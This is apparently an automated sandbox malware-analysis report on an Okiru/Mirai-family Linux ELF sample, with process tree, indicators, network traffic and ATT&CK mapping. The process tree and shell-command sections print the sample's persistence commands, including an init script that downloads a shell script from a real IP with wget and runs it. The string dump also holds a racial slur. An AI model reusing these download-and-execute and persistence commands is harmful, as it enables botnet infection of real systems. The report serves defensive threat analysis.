Edit tour

Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name:	sh4.nn.elf
Analysis ID:	1581269
MD5:	24caeeba560b79d96f69e0fa802c1027
SHA1:	4af4647443fe983466e106df0ab343a2c33ba271
SHA256:	dd693e64b0d5e76716ab7b4cb4ee52c19e70caddf9dd42f49df408acc93eca38
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581269
Start date and time:	2024-12-27 09:20:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	sh4.nn.elf
Detection:	MAL
Classification:	mal84.spre.troj.evad.linELF@0/10@0/0

Warnings

VT rate limit hit for: http://94.156.227.229/
VT rate limit hit for: http://94.156.227.229/lol.sh
VT rate limit hit for: http://94.156.227.229/oro1vk

Runtime Messages

Command:	/tmp/sh4.nn.elf
PID:	6253
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6225, Parent: 4331)

rm (PID: 6225, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR

dash New Fork (PID: 6226, Parent: 4331)

rm (PID: 6226, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR

sh4.nn.elf (PID: 6253, Parent: 6155, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6273, Parent: 6253)

sh (PID: 6273, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6278, Parent: 6273)

systemctl (PID: 6278, Parent: 6273, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

sh4.nn.elf New Fork (PID: 6294, Parent: 6253)

sh (PID: 6294, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6296, Parent: 6294)

chmod (PID: 6296, Parent: 6294, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

sh4.nn.elf New Fork (PID: 6297, Parent: 6253)

sh (PID: 6297, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6299, Parent: 6297)

ln (PID: 6299, Parent: 6297, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

sh4.nn.elf New Fork (PID: 6300, Parent: 6253)

sh (PID: 6300, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"

sh4.nn.elf New Fork (PID: 6302, Parent: 6253)

sh (PID: 6302, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6304, Parent: 6302)

chmod (PID: 6304, Parent: 6302, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6305, Parent: 6253)

sh (PID: 6305, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6307, Parent: 6305)

mkdir (PID: 6307, Parent: 6305, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

sh4.nn.elf New Fork (PID: 6308, Parent: 6253)

sh (PID: 6308, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6310, Parent: 6308)

ln (PID: 6310, Parent: 6308, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf

sh4.nn.elf New Fork (PID: 6311, Parent: 6253)

sh4.nn.elf New Fork (PID: 6313, Parent: 6311)

sh4.nn.elf New Fork (PID: 6315, Parent: 6311)

udisksd New Fork (PID: 6265, Parent: 799)

dumpe2fs (PID: 6265, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6291, Parent: 6290)

snapd-env-generator (PID: 6291, Parent: 6290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6321, Parent: 799)

dumpe2fs (PID: 6321, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6359, Parent: 799)

dumpe2fs (PID: 6359, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6380, Parent: 799)

dumpe2fs (PID: 6380, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sh4.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6253.1.00007fbf20400000.00007fbf20414000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: sh4.nn.elf PID: 6253	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: sh4.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: sh4.nn.elf

ReversingLabs: Detection: 34%

Source: sh4.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60024 -> 94.156.227.234:38242

Source: /tmp/sh4.nn.elf (PID: 6253)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: sh4.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: sh4.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/sh4.nn.elf (PID: 6253)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/sh4.nn.elf (PID: 6253)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6299)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6310)	File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/sh4.nn.elf (PID: 6253)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6296)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6304)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6430/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6410/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6421/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6432/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6420/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6431/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6423/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6059/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6422/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6433/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6359/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6425/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6424/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6427/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6426/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6418/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6429/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6417/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6428/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6313)	File opened: /proc/6419/status	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6273)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6294)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6297)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6300)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6302)	Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6305)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6308)	Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6296)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6304)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6307)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6225)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR			Jump to behavior
Source: /usr/bin/dash (PID: 6226)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR			Jump to behavior

Source: /bin/sh (PID: 6278)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6253)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6296)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6304)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6253)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6253)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6300)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/sh4.nn.elf (PID: 6253)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6300)	File: /etc/init.d/sh4.nn.elf			Jump to dropped file

Sample deletes itself

Source: /tmp/sh4.nn.elf (PID: 6315)

File: /tmp/sh4.nn.elf

Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6253)

Queries kernel information via 'uname':

Jump to behavior

Source: sh4.nn.elf, 6253.1.0000556e3458c000.0000556e34610000.rw-.sdmp	Binary or memory string: Y4nU!/usr/bin/vmtoolsd
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
Source: sh4.nn.elf, 6253.1.0000556e3458c000.0000556e34610000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: 1nU/tmp/qemu-open.L0CwJZ
Source: sh4.nn.elf, 6253.1.0000556e3458c000.0000556e34610000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6253.1.0000556e3458c000.0000556e34610000.rw-.sdmp	Binary or memory string: X4nU5!/etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.L0CwJZ
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: sh4.nn.elf, 6253.1.00007ffc8cc71000.00007ffc8cc92000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXXSXPF

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6253.1.00007fbf20400000.00007fbf20414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6253, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6253.1.00007fbf20400000.00007fbf20414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6253, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sh4.nn.elf	34%	ReversingLabs	Linux.Exploit.Mirai
sh4.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://94.156.227.229/lol.sh	100%	Avira URL Cloud	malware
http://94.156.227.229/	0%	Avira URL Cloud	safe
http://94.156.227.229/oro1vk	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	sh4.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/oro1vk	sh4.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	feiwbps.elf	Get hash	malicious	Mirai	Browse
	most-mips.elf	Get hash	malicious	Unknown	Browse
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	byte.mips.elf	Get hash	malicious	Unknown	Browse
	most-x86_64.elf	Get hash	malicious	Mirai	Browse
	Mozi.m.elf	Get hash	malicious	Mirai	Browse
	byte.x86.elf	Get hash	malicious	Mirai, Okiru	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse
